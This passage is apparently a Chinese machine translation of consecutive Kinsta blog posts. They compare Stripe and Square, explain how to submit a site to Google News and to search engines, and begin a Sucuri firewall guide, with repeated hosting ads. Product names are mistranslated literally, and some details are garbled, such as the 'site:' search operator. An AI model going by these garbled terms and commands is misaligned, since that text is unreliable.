请记住,Square 确实为网站所有者提供了创建 Weebly 商店或 Square 在线商店的机会。但是如果那是你想要走的路线,你将不得不支付额外的费用。
为了使用 Weebly 平台建立一个电子商务商店,Square 计划起价为每月 8 美元。随着网上商店的扩张,你会发现自己需要更多的功能,这可能会变得更加昂贵。
如果您想创建一个 Square 在线商店,您可以创建一个免费商店,或者投资每月 12-72 美元的高级计划,以获得以下功能:
获胜者:条纹
条纹与方形:接受的付款类型
种类
Stripe 使事情变得简单,因此使用 Stripe 的企业不必处理额外的商家帐户。以下是您可以在 Stripe 网上商店接受的付款类型:
- 信用卡。
- 借记卡。
- 国际卡。
- ACG 直接借记和贷记(一个功能方块没有)。
- 电汇。
Stripe 也接受比特币,这表明 Stripe 不害怕探索新的领域,并参与尖端技术。你甚至可以通过几个简单的步骤创建一个带条纹的比特币捐赠按钮。
此外,Stripe 还接受 Masterpass by Mastercard 和 Visa Checkout 等钱包(等)。最棒的是,Visa 和 MasterCard 占据了令人印象深刻的 80.1%的信用卡网络。
Credit card market share (Image source: WalletHub)
Stripe 还支持超过 135 种不同的货币,因此接触国际客户群从来都不是问题。使用 Stripe 的唯一缺点是,您目前无法接受当面付款。
平方
多年来,随着 Square 扩展其服务以满足希望面对面和在线开展业务的公司的需求,Stripe 与 Square 的比较变得越来越重要。
Square 在线处理所有主要信用卡:
注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
- 签证。
- 万事达卡。
- 发现。
- 美国运通。
此外,它将接受 Apple Pay、Android Pay 和电子钱包支付。Square 提供给顾客的东西,Stripe 没有,就是结账硬件。而且最赞的是,当面接受移动支付的读卡器和 POS 机 100%免费。
获胜者:平局
条纹与方形:客户服务质量
条带客户支持
在客户支持方面,Stripe 的声誉并不总是最好的。事实上,在 2018 年之前,Stripe 客户没有办法实时获得支持。
为了解决这个问题,Stripe 在 2018 年透露,所有 Stripe 客户现在都可以获得 24/7 实时聊天和电话支持,以补充现有的工作时间(周一至 Fri 上午 9 点至下午 5 点)提供的电子邮件支持。如果你想和其他 Stripe 用户取得联系,还有 Freenode 论坛( #stripe )。
现在可以肯定地说,Stripe 在客户支持方面表现出色,尤其是在面对 Square 的支持水平时。这是在您意识到除了大量文档之外,Stripe 还有一个专门的支持中心,里面满是文章和视频,解答您最迫切的支持问题:
Stripe support center
可能会让一些人反感的一点是,Stripe 还提供每月高达 1000 美元的高级支持,这对于处理大量支付的大型企业来说很好,但对于预算有限的小型企业来说就不那么好了。
虽然这对那些负担不起每月 1000 美元的人来说可能不公平,但我们认为 Stripe 通过每个人都可以访问的 24/7 实时聊天和电话支持来弥补这一不足。
Square 客户支持
Square 目前为客户提供以下支持选项:
- 电话和电子邮件支持。
- 实时聊天。
- 专门的 Twitter 支持:@SqSupport。
您还可以通过搜索问题或关键词进入 Square 社区论坛,与其他 Square 用户建立联系:
Square communities forum
虽然表面上看起来很棒,但值得注意的是,Square 的客户服务并不总是最好的。许多人抱怨他们的账户被无故冻结或终止。更糟糕的是,当这种情况发生时,Square 会自动切断你的电话支持,只会通过电子邮件与你沟通,这使得解决问题更加困难。
正因为如此,尽管 Square 提供了与 Stripe 相同的支持渠道(实时聊天、电话、电子邮件,甚至社区论坛),但它无法与 Stripe 多年来努力建立的质量相媲美。
获胜者:条纹
条纹与正方形:文档
种类
Stripe 拥有非常高级且对开发人员友好的文档,这意味着要阅读大量文档,您将需要一些编码、开发或技术技能。
Stripe documentation
这并不是说它没有帮助。但是如果你的团队中没有开发人员(这里你可以雇佣一名 WordPress 开发人员),你很可能会遇到一些你难以理解的事情。
想让你的电子商务商店比你的竞争对手更快?我们提供世界一流的全天候支持和超快的服务器。查看我们的计划!
平方
另一方面,Square 坚持认为所有的东西都应该简单易懂,适合所有技能水平的人。他们有一个带文档的方形指南部分来帮助你开始。
Square guides
如果你是一名开发者,总会有开发者文档、开发者博客,以及开发者专用的 Slack 频道(阅读:如何使用 Slack )。
总之,Square 支持刚起步的用户和更高级的用户,而 Stripe 主要支持高级文档,帮助人们在他们的网站上创建完全可定制的结账体验。
获胜者:方块
条纹 vs 方形:电子商务集成
Stripe 和 Square 都有电子商务插件集成,可以与流行的电子商务平台协同工作。他们也有一个开放的 API 和开发者工具,虽然 Stripe 的更先进,有更多的功能,并包括用于构建完全可定制的结帐的资源。
但这就是相似之处的终点。
种类
条纹是非常多才多艺的,尽管没有正方形的功能。例如,它集成了几十个购物车,包括简易数字下载、 Ecwid 和 X-Cart。它还可以与各种电子商务平台合作,如 Squarespace 、 Shopify 和 Shopify 替代品,如 WooCommerce 。
由于 Stripe 是为在线卖家设计的,它可以连接到几乎任何类型的网站、在线销售平台或电子商务平台。有超过 98 个应用程序来增强支付过程,只有使用 Stripe,您才能真正扩展您的在线商店。
Stripe 和 WordPress/WooCommerce
Stripe 没有官方的 WordPress 插件或集成。但是 WordPress 社区中有很多插件开发者,他们使得将 Stripe 集成到 WordPress 站点变得轻而易举。
以下是为 WordPress 设置 Stripe 的一些常用方法:
- 作为一个没有电子商务功能的基本 WordPress 网站的一次性支付页面。
- 使用一个表单插件,比如 Gravity Forms 来收取付款、存款或捐款。
- 免费使用你的 WooCommerce 网站。
- 轻松数字下载,这是一个销售数字产品的流行平台。
平方
Square 是唯一一个具有免费在线商店功能的支付网关,可以自动连接到 Square payments。这也是唯一的选择,与一个电子商务平台( Weebly ) 合作,并通过该平台提供广场支付供人们使用。
Square 是一个包含电子商务功能的全渠道解决方案。虽然你不能定制 Stripe 允许的那么多东西,但 Square 对初学者来说足够友好,任何人都可以使用,而且足够先进,开发者或大公司也可以利用它。
Square 整合了 Wix 、Weebly、Ecwid、 BigCommerce 和 3dcart 供刚起步者使用。对于那些需要更多的人来说,Square 与 Drupal 、 WooCommerce 、 Magento、和定制网站配合得很好。
Square 和 WordPress/WooCommerce
Square 可以轻松集成到你现有的WordPress.com 网站。要开始,你所要做的就是拥有一个高级商务 WordPress 计划(每月 25 美元起,并使用任何 Square 支持的 WordPress 电子商务插件,如 WooCommerce 或 WP EasyCart 。
如果你有一个自托管的 WordPress.org 网站,你也可以将 Square 整合到你的网上商店中,就像你对 Stripe 所做的那样。例如,WooCommerce Square 将为您提供在 WooCommerce 和 Square POS 之间同步库存和产品数据的最佳方式。
最后,如果你是多渠道卖家,Square 就赢了。如果你是一家纯在线企业,Stripe 会胜出,因为它接受更多的支付类型,支持更多的货币。
获胜者:条纹
条纹 vs 方形:利弊
种类
优点
- 透明、统一费率和有竞争力的定价。
- 全球可扩展性和覆盖范围。
- 没有月度合同。
- 完全可定制的结帐解决方案。
- 客户永远不会离开你的网站来完成购买。
- 多个支持渠道,有些全天候可用。
- 完全符合 PCI 规范。
缺点
- 许多人抱怨缓慢的电子邮件响应时间和其他客户支持问题。
- 未由 Stripe 解决的退款,如果您在争议中败诉,将会产生费用。
- 对于技术知识有限的人来说,学习曲线很陡。
- 不适合高风险业务。
平方
优点
- 特别人性化。
- 非常适合寻找全渠道支付解决方案的人。
- 非常适合低交易量的商家。
- 极具竞争力的定价,包括按存储容量使用计费保护。
- 独特的电子商务解决方案。
缺点
- 很多关于没有通知就终止账户的投诉。
- 缺乏功能,特别是订阅工具。
- 不适合高风险业务。
- 对于有大量业务的大公司来说价格昂贵。
条纹 vs 方形,哪个更好?
因为支付网关是如此相似直到它们不是,所以当谈到 Stripe vs Square 时,很难说出一个明显的赢家:
- 如果你需要网上销售和面对面销售的灵活性,Square 凭借其全渠道特性遥遥领先。
- 如果您需要一个可以全球扩展的严格的在线解决方案,或者一个独立的发票/付款收集解决方案,Stripe 是首选。
摘要
选择正确的支付网关并不是一个容易的选择。由于条纹与方形如此势均力敌,这将归结到个人特点,以帮助您做出最终决定。
如果你是经营网店的新手,而且技术知识有限,Square 将是更好的选择。与 Stripe 相比,它的价格极具竞争力,并且附带简单的设置过程和初学者友好的文档来指导您。
然而,对于那些寻求更加定制化的结账流程的人来说,Stripe 将是你的最佳选择。如果你经营一家依赖于销量的电子商务商店,你将需要你能得到的每一个功能来扩大你的业务并确保更多的销售。这意味着覆盖全球,可获得 24/7 全天候支持,并且可以灵活地将 Stripe 支付网关添加到您轻松选择的任何网站或平台。
让你所有的应用程序、数据库和 WordPress 网站在线并在一个屋檐下。我们功能丰富的高性能云平台包括:
- 在 MyKinsta 仪表盘中轻松设置和管理
- 24/7 专家支持
- 最好的谷歌云平台硬件和网络,由 Kubernetes 提供最大的可扩展性
- 面向速度和安全性的企业级 Cloudflare 集成
- 全球受众覆盖全球多达 35 个数据中心和 275 多个 pop
在第一个月使用托管的应用程序或托管的数据库,您可以享受 20 美元的优惠,亲自测试一下。探索我们的计划或与销售人员交谈以找到最适合您的方式。
如何向谷歌新闻和谷歌发现提交你的网站
谷歌新闻的目的是过滤全世界的新闻,让读者以一种容易阅读、理解和使用的方式获得及时的新闻。
那么这对你的网站和你的站点意味着什么呢?大量的流量、可信度和权威性。
如果这听起来像是你想为你的网站做的事情(说实话,谁不想呢),那么继续读下去,找出你需要知道的关于如何将你的网站提交到谷歌新闻的一切。
什么是谷歌新闻?
Google News 是一个新闻聚合器,可以定制最近 30 天的新闻文章和故事。
如今,随着谷歌新闻报道可以出现在其他谷歌产品中,它甚至还不止于此,例如:
- 谷歌新闻提要(咄)
- SERP 页面中的“头条新闻”部分
- SERP 页面中的“新闻标签”(可以这么说,就像你拥有的用于图片的标签)
- Google Discover, Google 的新 feed 基于改进的知识图能够根据单个用户的搜索历史提供定制结果。
以下是谷歌新闻的样子:
Kinsta 把我宠坏了,所以我现在要求每个供应商都提供这样的服务。我们还试图通过我们的 SaaS 工具支持达到这一水平。
An example page of science stories on Google News
根据您的位置和语言设置,内容被组织成不同的类别。作为读者,您还可以定制订阅源,以涵盖您感兴趣的故事。
你的站点+谷歌新闻=流量、可信度、权威性。✅,这是一个我们可以支持的等式!🤓使用本指南了解如何将您的网站提交到谷歌新闻 点击发送推文
如何让你的网站上谷歌新闻,发现,和新闻相关的来源
谷歌新闻与谷歌搜索引擎不同。
后者发送爬虫扫描网络更新并索引这些更新。谷歌新闻也有爬虫,但它们大多抓取和索引被认为是高质量的网站和内容,符合谷歌新闻内容政策,或者在过去已经被批准。
事实上,直到 2019 年 12 月,你必须手动将你的网站提交给谷歌新闻,才能被考虑。但是情况不再是这样了,因为谷歌宣布了这个消息:
“出版商会被自动列入头条新闻或搜索的新闻标签。”
The official word from Google about being eligible for Google News
巴瑞·亚当斯首先发现了这一点:
Barry Adams spotted that publishers don’t need to submit their sites
很好。所以你不需要担心做什么,对不对?
只是坐以待毙,等待谷歌新闻报道你的网站,为它带来更多的流量?不完全是。
虽然任何人都可以进入谷歌新闻,但你仍然需要满足某些标准,如:
- 你必须每天创造引人注目的内容。它必须是与你的观众相关的新闻。
- 你必须遵循谷歌新闻内容政策,它涵盖了写作的标准、责任性、权威性、可读性、技术指南和新闻质量指南。
- 你永远不应该忽视谷歌搜索要素,其中包括你内容的质量,你内容的设计,你网站的技术方面(使用专业主题将满足这一点——只要确保它加载快)。
- 一旦你满足了这些准则,就该开始向谷歌新闻提交你的网站了。在这篇文章的后面,我会告诉你如何正确地做这件事。
在此之前,让我澄清一件重要的事情:
你需要把你的网站提交给谷歌新闻吗?
是也不是。
让我们回顾一下。2019 年底,谷歌宣布了新的谷歌新闻,除了几项改进和新的用户界面,还带来了一些新东西:
“我们开发了一种新的故事理解技术,来绘制新闻故事中涉及的人、地方和事情,然后在它们之间建立联系。”
推动谷歌新闻的新技术是几种机器学习技术的结合,包括 BERT 模型。
伯特是什么?
我知道你在想什么。和芝麻街没关系。
为了这篇博文的目的,你应该知道 BERT 是一个自然语言处理模型,它能够通过查看单词前后的单词来考虑单词的完整上下文。
基本上,这是谷歌更好地理解页面上内容的一种方式。
部分是因为这项新技术,谷歌不再要求你向谷歌新闻提交你的网站。
现在,你能自动出现在谷歌新闻中并不意味着你会。让我们增加你的机会,手动提交到谷歌新闻。
别担心,用不了多长时间。
如何向谷歌新闻提交你的网站
进入谷歌发布中心,点击添加发布:
How to add a publication to Google News
现在,您需要填写一些具体信息。这是不言自明的:
如果你在谷歌新闻和谷歌搜索控制台使用同一个谷歌账户,你可以很容易地验证你的网站。
只需点击网站属性 URL 框旁边的搜索控制台中的验证即可:
Verifying your domain using Google Search Console in Publisher Center
如果你需要更多帮助,你可以查看我们的 GSC 安装指南。
接下来,你可以给你的出版物添加一个 RSS 订阅源,添加一个自定义标志,甚至可以设置谷歌广告,如果你想将你的内容货币化的话。
一旦您填写了所有必需的内容并同意条款和条件,您就可以发布:
Publishing status for your publication in Google News
我告诉过你提交你的网站不会花很长时间(如果你忽略了需要 2-4 周的审查过程)。
但是等等,还有更多。
充分利用谷歌新闻的 7 个额外步骤
如果你已经走到这一步,这意味着你真的想增加你自己获得一些甜蜜的谷歌新闻流量的机会。
让我们探讨一下你应该注意的几个方面,以便利用你最近提交的谷歌新闻。它们是谷歌新闻特定提示和谷歌喜欢的更通用提示之间的恰当平衡:
1.创建一个谷歌新闻网站地图
你不需要为谷歌新闻(和一般的谷歌)准备一个网站地图,但是当你提供一个的时候,你的内容被更快更好的抓取的几率会更高。
为什么?网站地图使得搜索引擎抓取和索引你的内容变得容易。
幸运的是,为你的站点创建一个站点地图非常简单。这是我们的 XML 站点地图的一个例子:
Kinsta’s XML sitemap
不幸的是,谷歌新闻网站地图不同于“标准”的谷歌搜索网站地图,所以如果你想把你的网站提交给谷歌新闻,你需要创建一个新的。
如何创建谷歌新闻网站地图
为了 100%确定并完全控制你提交给谷歌新闻的内容,你需要实现一个谷歌新闻网站地图。
为此,你可以使用免费的 WordPress 插件 XML Sitemap & Google News 或者选择一个高级解决方案,比如 Yoast 的News SEO(69 美元)。
如何使用 XML 网站地图和谷歌新闻插件创建谷歌新闻网站地图
XML 网站地图&谷歌新闻是一个免费的 WordPress 插件,它将创建一个 XML 网站地图并将你的更新发送到谷歌新闻。它非常好用,而且极其简单。
安装完成后,你必须在设置中启用谷歌新闻网站地图功能:
Enabling the Google News sitemap
保存后,您将能够在https://yoursite.com/sitemap-news.xml访问您的谷歌新闻网站地图提要。它看起来会像这样:
注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
Google News Sitemap Feed example
如果你已经在使用 Yoast SEO 插件,你可能会收到一个关于同时使用这两个插件的警告:
XML Sitemap & Google News conflicting with Yoast plugin
如果是这种情况,只需禁用“XML 站点地图索引”选项,因为最近安装了 XML 站点地图和谷歌新闻插件,现在可以在你的阅读>设置页面使用。这样,您就可以在 XML 站点地图上继续使用它们,而不会出现任何问题。
总而言之,XML Sitemap & Google News 插件的设置非常简单,而且它甚至可以和 WordPress multisite 一起工作。
2.遵循谷歌新闻指南
你的网站正在与许多其他网站竞争,这些网站也试图在谷歌上曝光。每天,仅在WordPress上就有数百万条帖子被发布。
说真的,看看这个关于 WordPress 活动的现场报道:
A WordPress map showing usage across the globe.
由于产生了如此多的内容,谷歌没有时间来处理不符合他们所有要求的页面。
避免你的网站因为没有遵守规则而被谷歌新闻拒绝,确保你网站的每个页面都符合谷歌新闻设定的准则。
Google News content policies for getting published.
3.总是格式化你的内容
谷歌新闻可以阅读你页面上的所有文字。但是如果你的网站有很多多媒体(比如图片和视频),它可能需要一些帮助。
这就是为什么你应该确保你最有新闻价值的内容格式正确。例如,这篇文章是在谷歌新闻上推荐给我的:
An article recommended to me on Google News
如果你点开它,你会看到它结构很好,有编号的副标题和最少的图片:
An example of a well-structured page recommenced to me on Google News
如果你真的想包含多媒体内容,使用标题和标题标签来给出内容的大概意思。理想的情况是,写一篇关于你文章的描述,这样谷歌就能理解(并提供给搜索者)。
4.向谷歌新闻提交 YouTube 视频内容
视频无处不在,谷歌新闻也不能忽略它们。事实上,如果你的业务依赖于视频,你应该利用它们。
要向谷歌新闻提交您的视频内容,您需要登录发布中心,点击顶部菜单栏中的内容标签。
从那里,您需要添加一个新的部分:
Adding videos to Publisher Center
这将打开一个新窗口,您可以在其中添加来自您的 YouTube 播放列表或频道的链接(如下例所示):
与宕机和 WordPress 问题做斗争?Kinsta 是一款考虑到性能和安全性的托管解决方案!查看我们的计划
Adding a YouTube channel in Publisher Center
这不是添加视频的唯一选择,因为你还可以通过<iframe>或媒体<RSS>标签将 YouTube 视频嵌入你的文章、你的订阅源。
5.创建友好和可读的网址
你需要注意你的 URL 结构。当试图了解质量和相关性时,Google 会查看整个页面寻找线索,包括 URL。
事实上,URL 是它首先寻找的地方之一。因此,如果你的网站的网址是由随机字符组成的,谷歌将无法理解他们,你的观众也不会。
例如,看看这些网址,哪个会带你去一篇关于如何给你的网站增加流量的文章?
A good (& descriptive) URL vs a messy and confusing one.
我想你能明白我的意思。
确保你的网址是搜索引擎优化友好和独特的。为每个页面创建独特的 URL 是必要的,这样谷歌和其他搜索引擎就能理解他们的内容。是 SEO 101 。
选择 URL 时要慢慢来。一旦创建了 URL,以后更改它可能会导致问题。
重定向呢?
以前发表的文章会被谷歌新闻抓取器抓取,但是,如果你重定向到一个新的网站或新的页面,你需要确保你使用的是 301 重定向。
定期检查你的抓取错误并尽快修复任何问题是有好处的。此外,确保新网站没有任何 404 错误。
延伸阅读:
6.优化您的所有页面
谷歌新闻显示最近的头条新闻,但它也允许访问者定制他们的订阅源,只查看首选类别的新闻。
Customized news feeds in Google News.
因此,你的内容在谷歌新闻上就像在搜索引擎上一样可搜索,所以要确保它得到了优化。
将标题放在首位。他们需要为你的听众提供与相关的关键词,如果可能的话,包括数字,并且要有说服力。
7.提供作者和公司的明确联系信息
谷歌新闻报道需要几个明确的方面,这些方面通常会被网站所有者忽略。具体来说,根据谷歌新闻内容政策:
“……谷歌上的新闻来源应该提供明确的日期、署名、关于作者、出版物、出版商、背后的公司或网络的信息,以及联系信息。”
为了帮助证明您的内容的有效性,您需要在每个新闻报道中包含联系方式信息。
署名文章应该在结尾包括一个简短的作者简介,包括一个职业头衔、电子邮件地址,甚至是到社交档案的链接。
AMP 呢?
加速移动网页(AMP) 旨在尽可能快地在手机上浏览网页。谷歌新闻在其所有移动平台(网络、安卓和 iOS)上都显示 AMP。
谷歌新闻需要 AMP 吗?
AMPs 不需要被谷歌新闻收录。但是如果没有 AMP 页面,一个以新闻为主的网站可能会错过来自移动搜索的大量潜在流量。
因此,如果您有一个发布大量新闻文章的网站,那么实现您的文章的有效 AMP 版本来为 SERPs 中专门以 AMP 故事为特色的 carousel 部分评分是值得的。
如果你对通过你的内容收集线索感兴趣,你可能想暂时搁置 T2 的 AMP 页面。
向谷歌新闻提交网站的最佳实践
让我们快速回顾一下您可以遵循的谷歌新闻最佳实践:
- 发布独特、优质内容。
- 内容必须写得好,引人入胜。
- 定期发布。
- 内容一定要及时。
- 将你的标题设计成描述主题的新闻文章。请记住,这些是新闻文章,不像博客文章。
- 分离你的内容,这样只有新闻文章被提交到谷歌新闻。谷歌新闻不包括诸如操作指南和招聘信息之类的文章。
- 使用相关图像。
- 如果可能的话,有多个作者。
- 有联系和关于的页面。
- 使用一个专业主题让它看起来像一个新闻网站。
- 建立谷歌分析和学习如何使用它
- 创建一个谷歌新闻网站地图。
- 利用发布中心管理您在 Google 新闻上的出版物。
一旦所有的标准都满足了,就该把你的网站提交给谷歌新闻来帮助搜索引擎了解你的网站了。
摘要
让更多人看到你的内容对内容创作者来说是每天的挑战。说到新闻网站,竞争非常激烈。这就是为什么你应该考虑让谷歌新闻试试给你的网站带来更多流量。
别忘了:你的新闻故事可能会在不同的地方结束。例如,想想 Google Discover,即使你是在新闻行业,它也能每月带动成千上万的人访问你的网站。看看我们上个月的流量:将近 8k!
Google Discover traffic stats
这是底线:
虽然你可以等待谷歌新闻选择你的网站,但是通过提交一个正确创建的谷歌新闻网站地图来简化这个过程也不失为一个好主意。
这个过程如此简单快捷,只需几分钟……为什么不试一试呢?
现在,我们想听听你的意见:你曾经向谷歌新闻提交过你的网站吗?你在那里有什么经历?关于如何向谷歌新闻提交网站,你有什么要补充的吗?
请在下面的评论区告诉我们您的体验!
让你所有的应用程序、数据库和 WordPress 网站在线并在一个屋檐下。我们功能丰富的高性能云平台包括:
- 在 MyKinsta 仪表盘中轻松设置和管理
- 24/7 专家支持
- 最好的谷歌云平台硬件和网络,由 Kubernetes 提供最大的可扩展性
- 面向速度和安全性的企业级 Cloudflare 集成
- 全球受众覆盖全球多达 35 个数据中心和 275 多个 pop
在第一个月使用托管的应用程序或托管的数据库,您可以享受 20 美元的优惠,亲自测试一下。探索我们的计划或与销售人员交谈以找到最适合您的方式。
将你的网站提交给搜索引擎(何时以及如何提交)
原文:https://kinsta.com/blog/submit-website-to-search-engines/
在谷歌和其他搜索引擎上获得索引是让你的网站获得免费流量的最有效的方法之一。但是你可能想知道:
如何向搜索引擎提交我的网站?
简单的回答是:这取决于搜索引擎。更长的答案是,每种方法都有具体的步骤可循。以下是您将在本文中学到的内容:
但是首先:
我需要把我的网站提交给搜索引擎吗?
是也不是。
搜索引擎的设计并不依赖于人工提交。就是效率不高。这就是为什么他们的机器人会抓取网页来寻找网站来索引。
如果你以前没有听说过这个术语:爬行是搜索引擎在网站上寻找新的链接,然后“跟随”这些链接。如果一个链接指向一些有用的东西(例如一个有用的网站),那么这个页面就会被编入索引。
Kinsta 把我宠坏了,所以我现在要求每个供应商都提供这样的服务。我们还试图通过我们的 SaaS 工具支持达到这一水平。
这意味着搜索引擎很擅长自己寻找新网站,只要它们是从网上的某个地方链接来的。
但是话虽如此…
为什么你应该把你的网站提交给搜索引擎
以下是你应该手动将网站提交给搜索引擎的几个原因:
- 安心–说到 SEO ,安全总比后悔好。手动提交你的站点有多快,值得一试。
- 直接告诉搜索引擎你的网站–通过以下方法提交你的网站,你可以告诉谷歌(和其他人)关于你网站的重要信息,主要是关于内容更新和重要变化。
- 这是一个简单的改进机会–通过提交您的网站,您可以使用各种工具来帮助改进您的网站。此外,您可以通知他们内容现在已经更新,需要再次爬网。
向搜索引擎提交网站:入门
在你开始向搜索引擎提交你的网站之前,这里有一些你需要的东西。首先,你需要能够访问和编辑你的网站。
后端访问对于向搜索引擎提交网站来说并不是必须的,但是如果你需要在后面添加东西,它可能会有所帮助。
例如:
- 如果网站没有站点地图。
- 如果网站需要一个 robot.txt 文件。
- 如果没有谷歌搜索控制台或必应站长工具的实现。
有了对网站的访问,就可以更容易地添加他们。
这些是网站被索引的关键要求。事实上,拥有一个正确设置的网站地图是帮助你的网站被搜索引擎选中的最重要的事情之一。
不要忘记,访问两个主要的搜索引擎工具集也是必要的:
谷歌搜索控制台
在将您的网站提交给 Google 之前,您需要设置搜索控制台并验证网站所有权。
要验证您的网站,复制 DNS TXT 记录并将其添加到您的域名提供商中,以验证域名所有权。
How to verify domain ownership using DNS records
用 DNS 记录验证你的站点是推荐的方法,因为你可以永久保留 DNS 记录,而且不会给你的站点增加额外的代码。
如果你不想(或不能)以这种方式验证你的域名,不要担心,还有其他方法来验证你的帐户。
Bing 网站管理员工具
Bing 使得设置网站管理员工具变得非常容易。如果你已经设置了搜索控制台,你可以直接导入你的站点。
注册后,只需点击导入按钮:
Import Search Console settings into Bing
这是一个让你的网站进入 Bing 网站管理员工具的简单方法。
现在你已经设置好了你需要的一切,是时候开始向所有主要的搜索引擎提交你的站点了。
先说谷歌。
我如何向谷歌提交我的网站?
向谷歌提交网站非常容易。
事实上,提交你的网站的唯一方法是把你的网站地图添加到谷歌搜索控制台。
方法如下:
1.找到您的 XML 站点地图
站点地图是一个 XML 文件,它列出了网站上的所有页面。
通常可以通过以下方式找到它:
YOURWEBSITE.com/sitemap.xml
如果你使用 WordPress 来驱动你的站点,并且使用 Yoast SEO 插件,你的站点地图将会是这样的:
Kinsta’s sitemap
一旦你找到了你的网站地图,你就可以进入下一步了:
2.将您的网站地图添加到谷歌搜索控制台
打开谷歌搜索控制台,在 Index 下,选择 sitemaps。
现在,你需要做的就是粘贴你的网站地图网址,点击提交:
Add a sitemap to Google Search Console
如果你有多个站点地图,只要重复这个过程,直到你所有的站点地图都在提交部分列出。
为了做到这一点,您需要添加并验证您的网站到 GSC。
注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
如果您需要更深入的步骤,我们有一个搜索控制台指南,它将带您了解您需要知道的一切。同样,我们也有这个指南,关于如何向谷歌新闻提交一个网站,如果你希望你的网站出现在那里。
关于向谷歌新闻提交你的网站的快速说明
Google News’ content policies
出版商不再需要提交他们的网站才有资格使用谷歌新闻应用和网站。具体来说,根据巴瑞·亚当斯:
出版商会被自动列入头条新闻或搜索的新闻标签。
3.向 Google 提交一个页面 URL
如果你只是想向谷歌提交一个单独的页面呢?这也很简单。
在搜索控制台中,转到 URL 检查并粘贴您想要索引的页面 URL。
如果页面没有被索引,你会看到 GSC 说‘网址不在谷歌上’。要让它被抓取,只需点击请求索引:
Use URL inspection to request indexing
如果页面被索引,你会看到‘网址在谷歌上’:
Indexed page in Search Console
如果你最近更新了内容,并希望谷歌重新抓取页面,你可以点击‘请求索引’来索引这些页面变化。
如何检查你的页面是否在谷歌上?
要查看您的网站是否已成功提交并被编入索引,只需在 Google 上搜索您的网址。如果谷歌已经抓取并索引了你的网站,它会显示在搜索结果中。
你可以试着从你的网站上复制一两段文字,然后在“引号”中搜索。如果你的网页在谷歌上,它应该会出现。
你可以使用的另一种方法是在谷歌中搜索操作符命令 "site:" 。只需键入:
网址:www。YOURWEBSITE.com
How to perform a site search in Google
谷歌只会显示你输入的域名的搜索结果。您可以在网站的主页或内部页面上使用站点搜索操作符。
厌倦了低于 1 级的 WordPress 托管支持而没有答案?试试我们世界一流的支持团队!查看我们的计划
我如何向雅虎提交我的网站?
好的,这是最简单的一个。为了让你的网站出现在雅虎上…你把你的网站提交给 Bing。
那不是打字错误。向 Bing 提交您的网站也会自动向 Yahoo 提交。
因此,您不妨进入下一部分,让您的网站在 Bing 上列出:
如何向 Bing 提交我的网站?
首先你需要去 Bing 站长工具。你需要确保你已经为你的网站设置好了。如果你需要帮助,这里有我们方便的必应 WMT 指南。
就像搜索控制台一样,在 Bing 中提交你的站点地图很简单。只需从菜单中选择“网站地图”,粘贴你的网站地图网址,点击提交。
Submit XML sitemaps in Bing Webmaster Tools
这不仅会将你的网站提交给 Bing,还会提交给 Yahoo(因为它们都是由 Bings Index 支持的)。
Bing URL 提交插件
如果你的站点是由 WordPress 驱动的,那么你可以使用他们的 Bing URL 提交插件向 Bing 提交你的内容。
Bing URL Submissions WordPress Plugin
免费使用且易于激活,在您添加 API 密钥后,该插件会自动将您的新内容或更新内容直接提交到 Bing 的搜索索引中:
Activating the Bing URL Submissions WordPress Plugin
您可以尝试一些功能,例如:
- 您可以根据需要打开和关闭自动提交功能。
- 手动提交 URL。
- 查看最近通过插件提交的 URL,也可以下载一个方便的列表来跟踪。
- 重新提交最近的网址的可能性。
我如何向 DuckDuckGo 提交我的网站?
这里的简短回答是:你没有。
DuckDuckGo 自动索引网页,所以你不需要手动提交你的网站给他们。
事实上,它使用了超过 400 个来源和 Bing 的搜索结果,所以如果你按照前面的步骤提交给 Bing(和 Yahoo ),你已经做了所有你需要的事情来加速你的网站在 DuckDuckGo 上的索引。
避免提交服务
让你的网站在谷歌、必应或雅虎上上市是免费的,所以你不应该支付提交服务来让你上市。
注册一个搜索引擎提交服务是没有意义的。如果你运气不好,你会被垃圾邮件轰炸,试图出售你的低质量搜索引擎优化服务。
重要的搜索引擎提供有用的资源来帮助网站提交并在 Google、Yahoo 和 Bing 上成功索引。你不需要服务来做这些。
其他搜索引擎提交资源
大多数搜索引擎都有特定的方式将网页提交到它们的索引中。以下是将您的网站提交给搜索引擎的官方页面链接:
看看下面的视频,了解更多关于使用 SEO 增加网站流量的信息:
摘要
谷歌和其他搜索引擎最终将能够找到你的网站,即使你没有手动提交给他们。
尽管如此,强烈建议使用站点地图提交你的站点,如果你没有一个合适的设置,这是值得的。为什么?它给搜索引擎提供了关于你的网站的额外信息,作为回报,你得到了关于你的网站的额外索引数据(甚至可能是 sitelinks )。
向搜索引擎提交网站对于向搜索引擎发送内容更新和变化的信号具有巨大的价值。强制进行新的抓取可以让你加快新添加的关键字的排名,而不是旧的关键字,旧的关键字不再相关。
由于 SEO 是一个不断变化的领域,让你的网站和页面被索引是最起码的。如果你想增加你的流量,还有更多的事情需要去做(这里有一个 SEO 清单作为开始),但是你现在已经在正确的轨道上了。
让你所有的应用程序、数据库和 WordPress 网站在线并在一个屋檐下。我们功能丰富的高性能云平台包括:
- 在 MyKinsta 仪表盘中轻松设置和管理
- 24/7 专家支持
- 最好的谷歌云平台硬件和网络,由 Kubernetes 提供最大的可扩展性
- 面向速度和安全性的企业级 Cloudflare 集成
- 全球受众覆盖全球多达 35 个数据中心和 275 多个 pop
在第一个月使用托管的应用程序或托管的数据库,您可以享受 20 美元的优惠,亲自测试一下。探索我们的计划或与销售人员交谈以找到最适合您的方式。
如何在你的 WordPress 站点上设置 Sucuri 防火墙
机器人流量比以往任何时候都高。据distilt Networks统计,2017 年,不良僵尸工具占所有网站流量的 21.8%,比上年增长 9.5%。不仅如此,74%的不良 bot 流量是由中等或复杂的 bot 组成的,它们通过将攻击分布在多个 IP 地址上或模拟人类行为来逃避检测。对于不知道如何过滤或阻止这类流量的企业来说,这是一个挑战。
今天,我们想向您介绍一种非常简单的方法,使用 Sucuri Web 应用程序防火墙(WAF)进行反击。无论你的 WordPress 网站是否受到 DDoS 攻击,或者你正遭受过多的僵尸程序和代理流量,WAF 可以帮助你立即解决这些问题。
